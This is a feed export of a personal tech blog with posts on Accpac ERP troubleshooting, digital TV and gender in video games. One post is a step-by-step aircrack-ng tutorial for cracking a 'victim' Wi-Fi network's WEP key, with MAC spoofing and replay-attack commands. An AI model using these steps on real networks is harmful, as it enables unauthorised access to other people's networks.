tag:blogger.com,1999:blog-78021321381338415062024-03-14T05:59:39.914-07:00Once a upon a time with a Computerඑකෝමත් එක කාලෙක කොම්පියුටරයක් සමඟ...Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.comBlogger45125tag:blogger.com,1999:blog-7802132138133841506.post-57285674154950623322012-11-30T21:20:00.003-08:002012-11-30T21:21:06.448-08:00Accpac Slowness Due to Environment Variable ConflictWhen installing Accpac on a windows platform it creates a Environment Variable(Environment variables are a set of dynamic named values that can affect the way running processes will behave on a computer).
When you uninstall Accpac from a Windows operating system it doesn't remove the Environment Path Variable. When you perform a new installation on the same operating system it creates a Environment Variable again. So there will be two Environment Path Variables for Accpac. When it comes to a server client architecture we have to install Accpac application server and workstations in client machines. When installing workstations it also creates Environment Path Variable in that particular machine too. So if you uninstall and reinstall Accpac workstation in the same machine then there also will be two environment variables. This PATH variable will have the network address of the Application server. Ex : \\192.168.1.10\Sage\Sage Accpac\Runtime
This becomes an issue when you shift the Accpac Application Server to a new network address and install workstations again for shifted Accpac application server. If you don't remove the Environment Variable of the previous installation then there will be two PATH variables for Accpac. When Accpac runs it refers this PATH variable and because of these two variables it will create a conflict. Ultimately this will cause a slowness in Accpac and previewing of crystal reports.
Hence it is a good practice to remove Environment PATH Variable after uninstalling Accpac in a networked infrastructure(when you have client server architecture for Accpac) to avoid sallowness in Application and crystal report previewing.
Below is how to find Environment PATH Variable
Windows Vista and Windows 7 users
01. From the Desktop, right-click My Computer and click Properties.
02. Click Advanced System Settings link in the left column.
03. In the System Properties window click the Environment Variables button.
Windows 2000 and Windows XP users
The path is now managed by Windows 2000 and Windows XP and not the autoexec.bat or autoexec.nt files as was done with earlier versions of Windows. To change the system environment variables, follow the below steps.
01. From the Desktop, right-click My Computer and click Properties.
02. In the System Properties window, click on the Advanced tab.
03. In the Advanced section, click the Environment Variables button.
Finally, in the Environment Variables window (as shown below), highlight the Path variable in the Systems Variable section and click the Edit button. Add or modify the path lines with the paths you wish the computer to access. Each different directory is separated with a semicolon as shown below.
C:\Program Files;C:\Winnt;C:\Winnt\System32
After finding the environment variable click edit and find the PATH for Accpac in PATH variables. There can be one or more variables separated by semicolon ( ; ). So you have only to choose the one represents the Accpac it will look like this "\\192.168.1.10\Sage\Sage Accpac\Runtime" without quotations. You have to select the path for Accpac and delete it and save.Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-35952056419812972392012-10-15T02:32:00.001-07:002012-10-15T02:34:38.319-07:00Re-implementing Sage Accpac ERP Modules when Upgrading<br />
I came across with a scenario where I had to carry out an upgrade for Financial Modules and re-implement Operational Modules. There I had implemented SM, GL, AR, AP, IC and OE modules. I had a requirement only to upgrade SM, GL, AP and AR modules from Accpac 5.2 to Accpac 6.0 and re implement IC, OE modules as new modules.<br />
<br />
This task was difficult because even we do not activate those modules from Data Activation UI when doing the upgrade all the tables and data reside in IC and OE are also carried to the new version in the database. Hence we had to find a solution for this scenario.<br />
<br />
The solution we found is shown below,<br />
<br />
1. Upgrade all modules from 5.2 to 6.0 including SM, GL, AP, AR, AP, IC and OE using data activation UI and Database Dump<br />
<br />
2. Create a new Accpac company in Accpac 6.0 with SM, GL, AP, AR, AP, IC and OE without any data.<br />
<br />
3. Dump the newly created Accpac 6.0 company database<br />
<br />
4. From that dump all tales related to IC and OE omitting SM, GL, AP and AR modules. These files are shown as REC files in DAT folder in Dump.<br />
<br />
5. Replace copied REC filed from empty company with upgraded database's dump files in DAT folder (All tales related to IC and OE omitting SM, GL, AP)<br />
<br />
6. DB LOAD the files replaced DUMP to Accpac<br />
<br />
After DB loading that DUMP file we got IC and OE modules without any data. Hence we could re implement IC and OE while having all past data and setup in Financial Modules.Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com3tag:blogger.com,1999:blog-7802132138133841506.post-31122460196473650562012-04-19T01:02:00.001-07:002012-04-19T01:02:52.777-07:00Security Vulnerability of Digital Television (DTV)TV is a dominant equipment of every household in this planet. The newest trend in Television is Digital Television (DTV). With this change the television will be a hyper connected with internet. I have described about digital television in another post in detail. You can read that post <a href="http://compdiary.blogspot.com/2012/01/introduction-to-digital-and-interaction.html">here</a>.<br />
Its said that 100 million TVs will be connected to internet by 2016. This will open up a total new market and more other benefits. Other than that in the same time it will discover vast number of targets for hackers.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_OeMwT4cysqpDWFR10ovyGeCvkjFTDJyFUvTqkXVq12mobt7YrrH6vVEOOOzGSPkijgf2iA3ohXGSwfFXwvu33xrcfjgqepyq-_1hBBvnhF9YQnhiKemZnZhIu2JkDIKjiQ5ziIcrc_M/s1600/tv.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_OeMwT4cysqpDWFR10ovyGeCvkjFTDJyFUvTqkXVq12mobt7YrrH6vVEOOOzGSPkijgf2iA3ohXGSwfFXwvu33xrcfjgqepyq-_1hBBvnhF9YQnhiKemZnZhIu2JkDIKjiQ5ziIcrc_M/s320/tv.jpg" width="320" /></a></div>
Internet connected TVs uses IP addresses (Internet Protocol) and they will be connected to internet almost every time the TV is on. So the network interfaces of these televisions will be always connected to internet.<br />
<a href="http://www.infoworld.com/d/security/spoiler-alert-your-tv-will-be-hacked-191013?source=footer">Spoiler alerts</a> says<br />
<i>"Our goal was to see if we could hack into the set-top box, steal
customer personal information, pirate services, and incur
denial-of-service conditions. Just for yucks, I added two more
objectives: to see if we could steal porn (typically, one of the biggest
revenue streams for cable companies) or force porn onto another
television that was watching Disney content, with the idea that offended
customers would drop their service." </i><br />
So what we can do is avoiding internet connected television but prevent doing transactions over internet connected television and be more conscious about what we are watching. Obviously television producers will come up with security options to prevent these vulnerabilities yet hackers will always find a way.Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-18738656978008139652012-04-17T03:19:00.002-07:002012-04-17T03:19:33.617-07:00Hack a Wi-Fi Network’s WEP Password with Linux<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpaoWyLCzrrl0PR56zjjPtGddt3ZCvZgAKLdCUz8qQK-XAG7NM1QegTU-BuA1XtTsVBhpvHoK6QP1p_EuqsmwcYVZoA-Reo6jo5GCFBOWXUG7XXfdyDo87gVa4PkYMn2F9L6WFNVH9d0/s1600/wep.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUpaoWyLCzrrl0PR56zjjPtGddt3ZCvZgAKLdCUz8qQK-XAG7NM1QegTU-BuA1XtTsVBhpvHoK6QP1p_EuqsmwcYVZoA-Reo6jo5GCFBOWXUG7XXfdyDo87gVa4PkYMn2F9L6WFNVH9d0/s1600/wep.png" /></a></div>
I started my internship program this month so I don't find much time to spend writing long articles. So I thought to show how to crack a Wi- Fi Network's WEP password. Again I must say at the beginning that I show this for educational purposes. So if you hack someones Wi-Fi network with this please take their written authority. And do on your own risk :)<br />
<br />
This hack only works for WEP passwords. So the victim should have used WEP in their Wi-Fi network. For other authentication methods like WPA or WPA2 are also breakable. There are tools out there to hack WPA2 authentication also but that takes time and long process than this I will consider posting an article on that later. So lets see how to do the hack.<br />
<br />
Do do this hack in the way I am going to describe you have to have Linux operating system. I would recommend you to have Ubuntu. Specialty with Ubuntu is its more user frendly and the terminal commands I will give will work on Ubuntu (commands like apt-get may change in other Linux distributions). And I take the assumption that you are familiar with Linux operating systems. (If you find any difficulty please ask)<br />
<br />
Below are the steps:-<br />
Use terminal and grant user super user or administrator rights. User can get it with <i><b>su </b></i>command or <i><b>sudo bash</b></i> command<br />
<br />
1. Install Aircrack-ng (This is the tool used to crack the wifi. This tool does not come with Ubuntu hence you have to install it on terminal)<br />
<b><i> apt-get install aircrack-ng</i></b> (Update Ubuntu before you use this command <br />
apt-get update.)<br />
<br />
2. Run the following to get a list of your network interfaces.<br />
<i><b>airmon-ng</b></i><br />
<br />
3. Stop running Wireless interfaces.<br />
<i><b> airmon-ng stop (interface)</b></i><br />
ifconfig (interface) down (We stop running wireless interface to change the MAC address of the interface)<br />
<br />
4. Change the MAC Address of the wireless interface.<br />
<i><b> macchanger --mac 00:11:22:33:44:55 (interface)</b></i> (You can add any MAC address here.We change the MAC address for security reasons this step is recommended but not essential)<br />
<br />
5. Start monitoring the packets.<br />
<i><b>airmon-ng start (interface)</b></i><br />
<br />
6. Dumps the packets. (You have to keep running the result of previous command and for this command open new terminal.We have to dump packets into a file so we can use that file when cracking the password)<br />
<i><b>airodump-ng -c (channel) -b (bssid) -w (file name) (interface)</b></i> (Channel and BSSID can be taken from the result of airmon-ng start (interface) command) <br />
<br />
7. Creating Traffic (You have to keep running previous two terminals and open a new terminal and use following command to boost up the traffic. This is useful when you have only one station to communicate with the router. This boost up the traffic so it will capture more data).<br />
<i><b> aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)</b></i><br />
<br />
8. Replay attack to fast the hack. (Open a new terminal for this command. This command is also for boosing up the hack with ARP requests)<br />
<i><b>aireplay-ng -2 -p 0841 -c (dmac) -b (bssid) (interface)</b></i><br />
<br />
9. Wait till Data section exceed at least 10,000 (number of data gathering change according to the size of the WEP key) in airmon-ng terminal and then hack for the key with following command.<br />
<i><b> aircrack-ng -b (bssid) (file name-01.cap)</b></i><br />
<br />
After executing this command you will get the WEP password of thevictim Wi-Fi network. <br />
<br />
Enjoy!!!Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-10064478572038128882012-02-19T08:59:00.000-08:002012-02-19T09:07:50.603-08:00Video games in Learning and Gender<span style="font-family: Arial, Helvetica, sans-serif;"><b><u>Introduction to Computer Games and Games based Learning (GBL) </u></b></span><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"></span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrSWFazpTyPNNzR9cMQtWhgglbMimsvSmMGHERwHMVCx8rmTxPQX_txQG4JoMfJm1RXfNXOiz1aPtziH3iHiOXUTOtx_BH1LJCk5TQEDl-RUn-KvBB95T8mZBOtXCTqqMDq6haF0gzi3c/s1600/17_5_orig.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="font-family: Arial, Helvetica, sans-serif;"><b><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrSWFazpTyPNNzR9cMQtWhgglbMimsvSmMGHERwHMVCx8rmTxPQX_txQG4JoMfJm1RXfNXOiz1aPtziH3iHiOXUTOtx_BH1LJCk5TQEDl-RUn-KvBB95T8mZBOtXCTqqMDq6haF0gzi3c/s320/17_5_orig.jpg" width="320" /></b></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;">A computer game, also known as PC game, is a video game played on a personal computer, rather than on a video game console or arcade machine. PC games are created by one or more game developers, often in conjunction with other specialists (such as game artists) and either published independently or through a third party publisher. They may then be distributed on physical media such as DVDs and CDs, as Internet-downloadable, possibly freely redistributable, software, or through online delivery services such as Direct2Drive and Steam. PC games often require specialized hardware in the user's computer in order to play, such as a specific generation of graphics processing unit or an Internet connection for online play, although these system requirements vary from game to game. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Game based learning uses competitive exercises, either pitting the students against each other or getting them to challenge themselves in order to motivate them to learn better.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Games often have a fantasy element that engages players in a learning activity through a story line.</span><span style="font-family: Arial, Helvetica, sans-serif;">In order to create a truly educational game, the instructor needs to make sure that learning the material is essential to scoring and winning.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Here are several elements that define an activity as a game (GBL): </span></div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Competition: the score-keeping element and/or winning conditions which motivate the players and provide an assessment of their performance. Note that players are not necessarily competing against each other. In fact, a lot of games have players working as a team to overcome some obstacle or opponent which is built into the game.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Engagement: Once the learner starts, he or she does not want to stop before the game is over. Lepper and Cordova (1992) refer to this phenomenon as "intrinsic motivation" and ascribe it to four sources: challenge, curiosity, control, and fantasy.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Immediate Rewards: Players receive victory or points, sometimes even descriptive feedback, as soon as goals are accomplished.</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">These features are similar to those of a good lesson plan:</span></div>
</div>
<div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Achievement: Each lecture or lab is based on objectives for students to achieve: new understanding and skills to master. The activities and material challenge students.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Motivation: Science is about topics that are fundamentally interesting. Instructors further motivate students by stressing connections between the course content and the students' own lives and concerns.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Assessment: Strictly speaking, the reward for doing well in school is increased understanding and new abilities. These are represented in terms of grades and credits, sometimes more detailed feedback.</span></li>
</ul>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"></span></b><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">So the challenge for the designer/instructor is to combine the two in such a way as to enhance the strengths of each approach, to make learning fun and to make games more useful.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>
</b></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Games have many attributes detailed below that are associated with how people learn.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div>
<ul><span style="font-family: Arial, Helvetica, sans-serif;">
<li>Social. Games are often social environments, sometimes involving large distributed communities. “It is not the game play per se but the social life around the edge of the game that carries much of the richness in terms of the game’s meaning, its value, and its social and cultural impact.”</li>
<li>Research. When a new player enters a game, he or she must immediately recall prior learning, decide what new information is needed, and apply it to the new situation. Those who play digital games are often required to read and seek out new information to master the game. </li>
<li>Problem solving. Knowing what information or techniques to apply in which situations enables greater success, specifically, problem solving. This often involves collective action through communities of practice.<span style="font-weight: bold;"> </span></li>
<li>Transfer. Games require transfer of learning from other venues―life, school, and other games. Being able to see the connection and transfer existing learning to a unique situation is part of game play. Simulations, Games, and Learning<span style="font-weight: bold;"> </span></li>
<li>Experiential. Games are inherently experiential. Those who play games engage multiple senses. For each action, there is a reaction. Feedback is swift. Hypotheses are tested, and users learn from the results.</li>
</span></ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The typical college student plays an estimated 1.8 hours a day of video games.<b> </b></span></div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The US military uses computer war games for training for everything from high-level international command coordination to using a weapon. New companies are springing up to provide educational games for businesses for subjects ranging from technical training and sexual harassment awareness. </span></div>
</div>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><br />
<div style="font-weight: bold;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">
<div style="font-weight: bold;">
<u>Video Games in Learning from a Gender Perspective</u></div>
<div>
The chart below shows the distribution of games in gender basis. This figure is a good place to set up the perspective we discuss the matter. Here we can see how each game type has a certain number of male and female users. So it’s clear that there is a difference in playing computer games form a gender perspective. Before discussing the learning we can look into the fact how gender represents in games. This survey is based on only Europe so when it comes to Asia and Middle East these numbers terribly change. </div>
<div>
<div style="font-weight: bold;">
<br /></div>
<div class="separator" style="clear: both; font-weight: bold; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnSgvosyLtNxEL85OP0mXgRvl9TNS_vm69D5UWHXlOVDg4SizdIuPt7ldGnp_B8uYLfJK2M7_DQe_0JFQ2uhsOEovfYXPVMqqqUFlVRed5F_c06tW3wGznGbq-8DInndKxoqwxrStuv3U/s1600/hartmann.image010.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnSgvosyLtNxEL85OP0mXgRvl9TNS_vm69D5UWHXlOVDg4SizdIuPt7ldGnp_B8uYLfJK2M7_DQe_0JFQ2uhsOEovfYXPVMqqqUFlVRed5F_c06tW3wGznGbq-8DInndKxoqwxrStuv3U/s400/hartmann.image010.gif" width="400" /></a></div>
<div>
I will discuss the fact with my personal experiences rather than getting information from online materials. I can mainly see several facts when I look into games I played in gender perspective. In first person shooting games I have played there was no main female character. Call of Duty is one of most popular game in that kind. Form CoD first release they have not added any female character for the player to play. But in CoD 2 I can remember in certain mission I heard female voice of a fellow solder. In fact there are many fellow soldiers. </div>
</div>
</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOyyiRG9SH0-JC3lOyvfDjGUjBG4KslZW9dflk9CG2hkf0fTVbqneDzjfnBhrsiuHeNjvSF-EPJC9hiKfF2mAHFvR9Vx4uoIkHCKlbAI0fmyOvNHxER3v783-yKXhxVKmtV7f9uceDsp4/s1600/call_of_duty_4_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOyyiRG9SH0-JC3lOyvfDjGUjBG4KslZW9dflk9CG2hkf0fTVbqneDzjfnBhrsiuHeNjvSF-EPJC9hiKfF2mAHFvR9Vx4uoIkHCKlbAI0fmyOvNHxER3v783-yKXhxVKmtV7f9uceDsp4/s320/call_of_duty_4_2.jpg" width="320" /></a></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Most recent game I played was Dues Ex Human Revolution where again a male character is the main role. As far I played I faced several boss fights after each stage. In some stages the boss was female characters. One another thing I must mention is the sex appealing figures of characters in the game. And basically game is driven on the condition “finding the girl”. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em; text-align: center;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDmtjaT1wb5kJKOLp-SzIGDxUDx8BqoVpcV1VdHvM1_RcseRr5iKkdKrAJ6Cx5U3u-IpkgoIV2jyH16-9AGblYudfFkQEEb7zjoV0R-C56Qsne2MphJL3ItydxJh5jkofpKKAOuqd_5K8/s1600/deus-ex-human-revolution-wallpaper.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDmtjaT1wb5kJKOLp-SzIGDxUDx8BqoVpcV1VdHvM1_RcseRr5iKkdKrAJ6Cx5U3u-IpkgoIV2jyH16-9AGblYudfFkQEEb7zjoV0R-C56Qsne2MphJL3ItydxJh5jkofpKKAOuqd_5K8/s320/deus-ex-human-revolution-wallpaper.jpg" width="320" /></a></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5DB43NCg9xIm8JX3GDmMH-USkYM640BtqrfZHnP944BcXKeGgBCISFISSiH7_kBGAztvqFnT4ab11Gw2qKJVy4-QPfJ_oRYenYMjeB05PonXdMNh7mbM0yjHxMXt52CfD30uTIGN7xU/s1600/nfs_the_run_hendricks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH5DB43NCg9xIm8JX3GDmMH-USkYM640BtqrfZHnP944BcXKeGgBCISFISSiH7_kBGAztvqFnT4ab11Gw2qKJVy4-QPfJ_oRYenYMjeB05PonXdMNh7mbM0yjHxMXt52CfD30uTIGN7xU/s320/nfs_the_run_hendricks.jpg" width="320" /></a></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">In car races the fact is same. Need for Speed has changed the gaming experience in their recent release of NFS game. In “NFS The Run” you have a main male character and certain situation you can control the character too other than cars. Here also you have a good looking girl helping you out. What we can understand from this is mainly games are developed for males. Which proves us that main target market are males. So the games females play are designed to touch the instincts of men’s. The main problem comes to my mind is weather females who play these games get the motivation and drive to play game from the game as I get as a male. Obviously most of them don’t. So I can describe this as discrimination of gender.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NTEiWt8A8qlu6y0rf0GdxYjU9mvK6ONTY9XwNb4V2JlJhb2_5XoBsF-ZTXDxeTBzcBVestyvrvk8pGYSPmqPvz4ooVKqmzkqsRXUy4yTgwHwFFTw6axAXAwT5N6x9u1dED3D1H3Qubg/s1600/sony-girl-scholarship-girl-playing-video-game.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5NTEiWt8A8qlu6y0rf0GdxYjU9mvK6ONTY9XwNb4V2JlJhb2_5XoBsF-ZTXDxeTBzcBVestyvrvk8pGYSPmqPvz4ooVKqmzkqsRXUy4yTgwHwFFTw6axAXAwT5N6x9u1dED3D1H3Qubg/s1600/sony-girl-scholarship-girl-playing-video-game.jpg" /></a></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif; text-align: left;">Other fact is how males and females represent in games. When representing males and females we can see that they try to give more look of sex appeal. In games like street fighter, tekken and many games we can see clearly how they represent the gender.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSLhoSEMZlFE3ZnAvY_imkK84swVkuvlcebPQMdcinEC0fuw84bEuTomXpmbBYHEM5OAcNrW3pXIaM_m4gN4mM-k9sxVLVmV1pLmbmfHr9mAQSYjnkpyU5MN_17EWOP__9BsUg-JxhVU/s1600/street-fighter-iv-conceptart-d8rnb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSLhoSEMZlFE3ZnAvY_imkK84swVkuvlcebPQMdcinEC0fuw84bEuTomXpmbBYHEM5OAcNrW3pXIaM_m4gN4mM-k9sxVLVmV1pLmbmfHr9mAQSYjnkpyU5MN_17EWOP__9BsUg-JxhVU/s320/street-fighter-iv-conceptart-d8rnb.jpg" width="222" /></a></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b style="margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM2pg7twRAu1-0aK7Os50S7jFqdb-WhMhY1xlWuxEJG3qZWaSmzfi57xSMQRi1LUGc7dEeTqozPT-VQPd72WQqgQ73M4BFWxyofTEQ4g9j_s4X3RmcMfRzgR9gZS4Om7HkJ5w41IQelM/s1600/top-25-street-fighter-characters-day-ii-20080805011822918-000.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipM2pg7twRAu1-0aK7Os50S7jFqdb-WhMhY1xlWuxEJG3qZWaSmzfi57xSMQRi1LUGc7dEeTqozPT-VQPd72WQqgQ73M4BFWxyofTEQ4g9j_s4X3RmcMfRzgR9gZS4Om7HkJ5w41IQelM/s320/top-25-street-fighter-characters-day-ii-20080805011822918-000.jpg" width="320" /></a></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">So what we can see clearly is when designing games for learning also we have to consider it from the gender perspective. If you build a game and expect from both genders to react in the same way or expect same outcome from both genders that would be a nightmare. Main target market for large game companies like EA and Activision is males. If you take entire world including Asia and Middle East you can easily understand the fact. So they specially care to add facts that can touch men’s instants to motivate and keep them in the game. In Need for Speed the Run I think it is the good looking girl that help you. So what I think is when developing games for learning the fact should be same. The developer should look in the gender perspective when developing games. In Sri Lanka we can see in Education there is some amount of female dominant if we look at the education sector as one entity. So a developer choose the ways of lager gaming companies do to apply for a learning game for Sri Lankan education sector he would fail. So it is very important to look at from a gender perspective when developing games for learning.</span>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-74541580538843627372012-01-10T09:56:00.000-08:002012-01-10T10:10:34.407-08:00Introduction to Digital and Interaction TV and It's Application in Sri Lanka<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div class="MsoNormal">
<b><u><span style="font-family: Arial, Helvetica, sans-serif; font-size: 16pt; line-height: 115%;">Digital
Television<o:p></o:p></span></u></b></div>
<div class="MsoNormal">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">In Digital Television the
transmission of audio and video is happened through digital signals. This is
the reason this television system called Digital Television or DTV. Because of
its nature of transmission Digital Television (DTV) is an advanced broadcasting
technology that has transformed television viewing experience to a new era from
analog television systems. Digital TV has enabled broadcasters to offer
television with better picture and sound quality. It also offers multiple
programming choices, called multicasting and interactive capabilities.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: center;">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/M_nTmRtAD98" width="560"></iframe></span></div>
<div class="MsoNormal">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-size: 12pt; line-height: 115%;">The switch from analog to digital
broadcast television is referred to as the Digital TV (DTV) Transition. In
1996, the U.S. Congress authorized the distribution of an additional broadcast
channel to each broadcast TV station so that they could start a digital
broadcast channel while simultaneously continuing their analog broadcast
channel.</span><span style="font-size: 12pt; line-height: 115%;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinDukZC0QnhxZij5xGzMl1dE93D71PjdbukLrQnSmOkP5Z7VelYQ6F4faUd708W9Wtxh1zlfQPIZQEN5wwprWBppIi-Q-h1iSFxhqTI1ngQWHJOVz2wmVi5UjAgMUghrj8aDOobIEubWA/s1600/Untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinDukZC0QnhxZij5xGzMl1dE93D71PjdbukLrQnSmOkP5Z7VelYQ6F4faUd708W9Wtxh1zlfQPIZQEN5wwprWBppIi-Q-h1iSFxhqTI1ngQWHJOVz2wmVi5UjAgMUghrj8aDOobIEubWA/s320/Untitled.jpg" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Digital television supports many different picture
formats defined by the broadcast television systems which are a combination of
size, aspect ratio (width to height ratio).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Digital television can be accessed using satellite,
digital terrestrial or cable. Digital terrestrial television (DTTV or DTT) is
the technological evolution of broadcast television and advance from analog
television, which broadcasts land-based (terrestrial) signals. The purposes of
digital terrestrial television, similar to digital versus analogue in other
platforms such as cable, satellite, and telecommunications, are reduced use of
spectrum and more capacity than analogue, better-quality picture, and lower
operating costs for broadcast and transmission after the initial upgrade costs.
A terrestrial implementation of digital television (DTV) technology uses aerial
broadcasts to a conventional television antenna (or aerial). Satellite
television is television programming delivered by the means of communications
satellite and received by an outdoor antenna, usually a parabolic mirror
generally referred to as a satellite dish, and as far as household usage is
concerned, a satellite receiver either in the form of an external set-top box
or a satellite tuner module built into a TV set. Satellite TV tuners are also
available as a card or a USB stick to be attached to a personal computer. In
many areas of the world satellite television provides a wide range of channels
and services, often to areas that are not serviced by terrestrial or cable providers.
In Europe over 10 000 satellite channels are available but in Sri Lanka still satellite
accessible digital televisions are not available yet. Cable television is a
system of providing television programs to consumers via radio frequency (RF)
signals transmitted to televisions through coaxial cables or digital light
pulses through fixed optical fibers located on the subscriber's property, much
like the over-the-air method used in traditional broadcast television (via radio
